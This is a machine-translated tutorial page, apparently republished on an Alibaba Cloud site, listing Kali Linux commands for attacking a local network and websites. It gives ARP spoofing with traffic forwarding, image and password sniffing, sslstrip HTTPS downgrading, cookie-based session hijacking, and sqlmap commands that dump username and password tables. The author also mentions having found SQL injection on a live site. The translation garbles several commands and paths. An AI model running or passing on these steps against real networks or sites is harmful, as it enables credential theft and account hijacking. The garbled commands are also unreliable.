Home > Others

Kali LAN Sniffing

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

1. Local Area network image sniffing

Tool Arpspoof

Arpspoof-i eth0-t 192.1681.10 (NIC destination address) 192.168.1.1 LAN Gateway, if you can use the LAN Scan tool in Windows Advanced IP Scanner

Linux scan LAN on-line host FPING-ASG 192.168.1.0/24


Cheating can not be the other side off the network, using traffic forwarding echo 1 >/proc/sys/net/ipv4/ip_forward

Check whether the cat Proc/sys/sys/net/ipv4/ip_forward was executed successfully
Get a picture of a native Nic Driftnet-i eth0

2. Password Sniffing

Use the spoofing command first Arpspoof

Ettercap-tq-i eth0

3. SSH remote connection operation link Kali Shell mode logoff

CTRL +alt +F1 switch to command-line mode

Using the command/etc/init.d/ssh start

Use Xshell link Kali ip

4, grab packet HTTPS traffic

First edit vim/etc/ettercap/etter.conf Modify ****linux * * Cancel #

Open Sslstrip-a-f-k

Turn on spoofing Arpspoof simultaneously forward traffic

Landing crawl traffic on HTTPS URLs

5. Session hijacking landing site has been logged on by others

Quickly add previously used commands! + part of the command will be complete

First use Arpspoof to spoof simultaneous traffic forwarding

Using the Wireshark Traffic capture tool

Using ferret to regenerate the grab Bag tool

Ferret-r J plus the crawled traffic packet generates a TXT file

Use Hamster-h to open a browser-----"setting up agents and ports

Or do not apply spoofing, use ferret-i eth0 and then use hamster to browse the Web

Another interface-based software Cookiecadger

6, Sqlmap to the ASP website detection

Sqlmap-u "www.baidu.com.id=2"

Sqlmap-u "www.baidu.com.id=2"--tables

Sqlmap-u "www.baidu.com.id=2"--columns-t "user"

Sqlmap-u "www.baidu.com.id=2"--dump-c "username, password"-T "user"

Cookies use Sqlmap-u "www.baidu.com.php.id=2"--cookie "id=23"--level=2

7, Sqlmap on the PHP site detection

Sqlmap-u "www.baidu.com.php.id=2"--is-dba detection is DBA (can write files to directory)

Sqlmap-u "www.baidu.com.php.id=2"--dbs (list all databases)

Sqlmap-u "www.baidu.com.php.id=2"--current-db (guessing the current database)

Sqlmap-u "www.baidu.com.php.id=2"--tables-d "admin" (guess the table name according to the admin database)

Sqlmap-u "www.baidu.com.php.id=2"--columns-t "PSS"-d "admin"

Sqlmap-u "www.baidu.com.php.id=2"--dump-c "Username,password"-T "PSS"-d "admin"

8. Case detection

Below is a vulnerability in SQL injection that I have detected on an online PHP web site

9, Metasploit

Msfconsole

I've written a lot about this in my previous microblog, but I'm not ready to finish it

10. Flow Analysis Tool nload

Attached: installation software Apt-get remove before uninstalling

Fix software that did not install successfully apt--fix-broken install

11.

Kali LAN Sniffing

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
session sniffing wifi sniffing sniffing wifi what is wifi sniffing wifi sniffing tools wireshark password sniffing awus036ach kali

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More